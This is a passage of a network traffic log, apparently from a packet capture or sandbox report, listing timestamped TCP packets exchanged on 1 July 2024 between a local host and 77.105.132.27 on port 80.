Jul 1, 2024 09:16:14.251780987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251791954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251802921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251813889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.251817942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.251851082 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252007008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252018929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252028942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252049923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252069950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252150059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252160072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252171040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252181053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252197027 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252213955 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252373934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252383947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252394915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252403975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252417088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252437115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252610922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252621889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252633095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252643108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252652884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252664089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252665997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252675056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252681017 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252686024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252696991 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252700090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252707958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.252732038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.252756119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253119946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253133059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253142118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253154039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253164053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253174067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253180027 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253185987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253196955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253206968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253209114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253225088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253248930 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253556967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253568888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253581047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253592968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253597021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253614902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253628969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253632069 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253640890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253654003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253664970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253675938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.253680944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.253706932 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254072905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254084110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254095078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254106045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254115105 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254117966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254129887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254146099 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254167080 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254367113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254379034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254390001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254400969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254406929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254412889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254426956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254430056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254457951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254486084 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254518032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254529953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254540920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254551888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254563093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254566908 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254575014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254586935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254599094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254605055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254610062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254614115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254621983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254635096 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.254637957 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.254678011 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.297524929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297595024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.297597885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297609091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297641039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.297671080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297682047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297693014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297708988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297719955 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.297734976 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.297766924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.297799110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.297852039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.343821049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343833923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343844891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343943119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.343952894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343965054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343976021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343986988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343997955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.343998909 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344024897 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344044924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344225883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344238043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344247103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344258070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344280958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344309092 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344446898 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344459057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344470024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344486952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344511032 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344520092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344540119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344563007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344737053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344748974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344758987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344769955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344780922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344790936 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344794035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344805956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.344829082 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.344855070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.345072985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.345083952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.345096111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.345104933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.345155001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.346695900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.346775055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.346786976 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.346837044 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.346915007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.346925974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.346936941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.346947908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.346961975 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.346986055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349152088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349267960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349278927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349328995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349337101 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349348068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349358082 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349364042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349374056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349375010 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349375010 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349391937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349420071 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349488974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349498987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349509954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349535942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349564075 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349603891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349616051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349626064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349648952 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349677086 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349733114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349793911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349806070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349816084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349822044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.349854946 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.349884033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350003958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350016117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350027084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350037098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350048065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350052118 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350064993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350075960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350075960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350109100 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350291967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350302935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350312948 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350323915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350334883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350334883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350368977 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350394964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350405931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350418091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350428104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350439072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350440025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350450039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350452900 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350461006 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350471973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350472927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350507021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350682020 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350691080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350701094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350713015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350717068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350723028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350734949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350744963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350748062 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350756884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350768089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350775003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350779057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350790977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.350797892 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350817919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.350843906 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351006031 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351017952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351030111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351039886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351051092 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351089001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351171970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351182938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351223946 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351232052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351243973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351259947 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351303101 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351382017 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351393938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351403952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351414919 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351425886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351428032 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351438999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351449966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351459980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351460934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351471901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351475000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351494074 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351516962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351716995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351728916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351738930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351756096 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351762056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351768017 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351779938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351788998 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351790905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351804018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351814985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.351814985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351844072 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.351856947 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.392205000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392235994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392247915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392260075 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392271996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392311096 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.392354965 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.392389059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392400980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392415047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.392442942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.392466068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438460112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438497066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438508987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438539028 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438565969 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438606024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438617945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438630104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438640118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438649893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438656092 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438674927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438705921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438846111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438857079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438868046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438882113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438893080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438899040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438904047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.438920975 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.438942909 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439115047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439126015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439136982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439157963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439158916 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439168930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439177990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439179897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439198017 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439215899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439475060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439533949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439544916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439555883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439568043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439574003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439587116 CEST	80	49752	77.105.132.27	192.168.2.4
